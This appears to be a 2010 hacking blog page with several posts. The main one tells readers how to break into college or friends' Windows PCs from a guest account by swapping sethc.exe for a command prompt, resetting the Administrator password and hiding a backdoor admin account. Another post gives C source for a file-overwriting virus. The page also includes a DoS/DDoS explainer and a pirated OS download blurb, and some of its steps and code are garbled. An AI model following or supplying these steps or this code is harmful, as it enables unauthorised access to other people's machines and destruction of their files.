Thursday, December 9, 2010

Hack administrator from Guest account

Posted by prithivi

Ever wanted to hack your college pc with guest account/student account so that you can download with full speed there ? or just wanted to hack your friend’s pc to make him gawk when you tell your success story of hacking ? well,there is a great way of hacking an administrator account from a guest account by which you can reset the administrator password and getting all the privilages an administrator enjoys on windows..Interested ? read on…
Concept
Press shift key 5 times and the sticky key dialog shows up.This works even at the logon screen. But If we replace the sethc.exe which is responsible for the sticky key dialog,with cmd.exe, and then call sethc.exe by pressing shift key 5 times at logon screen,we will get a command prompt with administrator privilages because no user has logged on. From there we can hack the administrator password,even from a guest account.
Prerequisites
Guest account with write access to system 32.
Here is how to do that -
  • Go to C:/windows/system32
  • rename comp.exe to Admi.exe
  • Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.


  • Now Log out from your guest account and at the user select window,press shift key 5 times.
  • Instead of Sticky Key confirmation dialog,command prompt with full administrator privileges will open.


  • Now type “ NET USER ADMINISTRATOR aaa” where “aaa” can be any password you like and press enter.
  • You will see “ The Command completed successfully” and then exit the command prompt and login into administrator with your new password.
  • Congrats You have hacked admin from guest account.
Further..
Also, you can further create a new user at the command prompt by typing “NET USER XERO /ADD” where “XERO” is the username you would like to add with administrator privileges. Then hide your newly created admin account by -
Here create a new DWORD value, write its name as the “user name” that u created for your admin account and live with your admin account forever :)
I hope that was informative..
........... ...............................................................................................................................................................................................................
........... ...............................................................................................................................................................................................................
........... ...............................................................................................................................................................................................................
........... ...............................................................................................................................................................................................................

Download Windows 8 Ultimate Xtreme Edition x86

(2010) | 2.45 GB

Posted By Prithivi

Download Windows 8 Ultimate Xtreme Edition x86 (2010) | 2.45 GB What is Windows 8 xTreme?Windows 8 xTreme its a System based on Windows 7 FiNal * Windows 8 xTreme doesn't have any components removed from Original Windows 7 Image so you wont lose any compatibly with software, hardware or miss any stuff at all.* Windows 8 xTreme its a Clean Windows 7 Image with a compilation of the best tweaks and a new integrated look ... keeping all...

The Difference Between a DoS and a DDoS


Attack POSTED BY Prithivi ,
DoS = Denial Of Service
DDoS = Distributed Denial Of Service
What is the difference between the two?
Whilst DoS and DDoS sound remarkably similar there are in fact differences between the two -
Dos



A DoS Attack is a Denial of Service attack.
This means that one computer and one internet connection is used to flood a server with packets (TCP / UDP).
The point of such a denial of service attack is to overload the targeted server’s bandwidth and other resources.
This will make the server inaccessible to others, thereby blocking the website or whatever else is hosted there.
DDoS
A DDoS Attack is a Distributed Denial of Service Attack.
In most respects it is similar to a DoS attack but the results are much, much different.
Instead of one computer and one internet connection the DDoS attack utilises many computers and many connections.
The computers behind such an attack are often distributed around the whole world and will be part of what is known as a botnet.
The main difference between a DDoS attack vs a DoS attack, therefore, is that the target server will be overload by hundreds or even thousands of requests in the case of the former as opposed to just one attacker in the case of the latter.
Therefore it is much, much harder for a server to withstand a DDoS attack as opposed to the simpler DoS incursion

Create Hidden Account In Windows7


POSTED BY Prithivi 27, 2010
Since we are going to do all the Editing in Window Registry it is Recommended to Back Up the Registry before going Further.




After you have Backed up your registry follow the Steps to Create your Hidden Account: First Goto Start -> Run -> Type regedit -> Enter In the Left Menu goto, HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cu rrentVersion\Winlogon\SpecialAccounts\UserList In the Right pane, Right click -> New -> String Value Right click on the new String Value and click Rename Type the Name of the Account you want to hide. Hit Enter then Right click on the String Value again and Change value to 0 which hides it. If you want it to be Visible to all Enter the Value 1. Now Save and Exit the Registry and Logoff. Goto welcome screen and Hit ctrl+alt+del twice to bring up Logon prompt Type hidden Accounts name and password
..........................................................

Saturday, December 4, 2010

How to Create a Computer Virus in C

How to Create a Computer Virus in C?

Step wise Explaination POSTED BY ADNAN ANJUM SATURDAY, AUGUST 21, 2010


#include
#include
#include
#include
#include
#include
FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main() {
st=clock();
clrscr();
done=findfirst(”*.*”,&ffblk,0);
while(!done) { virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088; printf(”Infecting %s\n”,ffblk.ff_name,a);
while(x>2048) { fread(buff,2048,1,virus);
fwrite(buff,2048,1,host); x-=2048; } fread(buff,x,1,virus);
fwrite(buff,x,1,host); a++; next: { fcloseall(); done=findnext(&ffblk);
} } printf(”DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(”TIME TAKEN=%f SEC\n”, (end-st)/CLK_TCK); getch();
}
COMPILING METHOD:
Dont Try in ur computer